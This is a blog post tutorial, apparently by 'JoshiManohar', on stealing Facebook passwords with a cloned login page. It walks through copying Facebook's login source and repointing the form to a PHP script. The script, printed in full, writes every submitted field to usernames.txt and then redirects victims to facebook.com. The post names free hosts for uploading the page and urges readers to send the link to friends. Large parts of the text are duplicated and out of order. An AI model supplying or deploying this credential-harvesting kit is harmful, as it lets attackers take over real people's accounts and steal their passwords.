Today i'm gonna teach you how to hack a facebook account with a phishing page.
by: JoshiManohar
Hacking a Facebook account always sounds very interesting to everyone, there is no doubt that facebook is a largest and most popular social network around the world but also most targeted as well. Hackers used various methods to exploit any one’s facebook account and today we will make you learn the one by using phishing webpage.
Please Note: Phishing is legally offensive. I am not responsible for any action done by you.
Phishing...
What is phishing and how is it done?
Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.
Required Files:
For LAZY Guys Like ME...
steps to create a phishing page:
1. Go to the Facebook Login Page , and then right click on empty space of the page, You will see the option view source page , click on that...

2. now a new tab will open which contain a source code, Select all the source code and copy

3. Now open the notepad and paste it in a notepad. then press CTRL+F (search), and type ACTION.

4. You will have to find a text which looks like...
action="login.php?login_attempt=1"
5. Delete all the text written in RED color and instead of it write Post.php then it will look like...
action="Post.php"
6. Now save it on your desktop with the name index.htm, not index.html, remember...
7. Now your phishing page is ready. it will look like a pic given below .
8. Open a new notepad and save the given data with the name post.php.
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) { fwrite($handle, $variable);
Open post.php in notepad and there is a text such like that "website you want to phish" replace it with http://www.facebook.com/ now save it with the name of post.php
9. You have two files now one is index.htm and another is Post.php, Remember file extension is important.
10. Now you have to upload these both files in a web hosting site , I prefer You to use www.000webhost.com or else www.my3gb.com.
11. I prefer u to use my3gb.com because it will be easy to use.

12. You have to make a account in my3gb.com , After the account confirmation log in your account and click on file manager

13. Now upload your files on my3gb.com ( index.htm and Post.php )...

14. Now click on index.htm and you will be redirected to facebook phishing page . it seems same as facebook log in page. It is your Phishing link. Copy That URL Address. Type any email address and password then click on login but you know that its a fake page and you will not log in, and it redirected to original facebook page.
15. Now open your my3gb account and reload page ,then you will notice that there is a third file uploaded there named as "username.txt"

16. Now open username.txt and you can see the victim's password

Now send the link of index.htm to your friends and hack them...
Lets Rockkkkk....... oooh Hackkkkk.......

2. now a new tab will open which contain a source code, Select all the source code and copy

3. Now open the notepad and paste it in a notepad. then press CTRL+F (search), and type ACTION.

4. You will have to find a text which looks like...
action="login.php?login_attempt=1"
5. Delete all the text written in RED color and instead of it write Post.php then it will look like...
action="Post.php"
6. Now save it on your desktop with the name index.htm, not index.html, remember...
7. Now your phishing page is ready. it will look like a pic given below .
![]() |
index
|
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) { fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;?>
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;?>
(or)
Download it from here download
Open post.php in notepad and there is a text such like that "website you want to phish" replace it with http://www.facebook.com/ now save it with the name of post.php
9. You have two files now one is index.htm and another is Post.php, Remember file extension is important.
10. Now you have to upload these both files in a web hosting site , I prefer You to use www.000webhost.com or else www.my3gb.com.
11. I prefer u to use my3gb.com because it will be easy to use.

12. You have to make a account in my3gb.com , After the account confirmation log in your account and click on file manager

13. Now upload your files on my3gb.com ( index.htm and Post.php )...

14. Now click on index.htm and you will be redirected to facebook phishing page . it seems same as facebook log in page. It is your Phishing link. Copy That URL Address. Type any email address and password then click on login but you know that its a fake page and you will not log in, and it redirected to original facebook page.
15. Now open your my3gb account and reload page ,then you will notice that there is a third file uploaded there named as "username.txt"

16. Now open username.txt and you can see the victim's password

Now send the link of index.htm to your friends and hack them...
Lets Rockkkkk....... oooh Hackkkkk.......








0 comments:
Post a Comment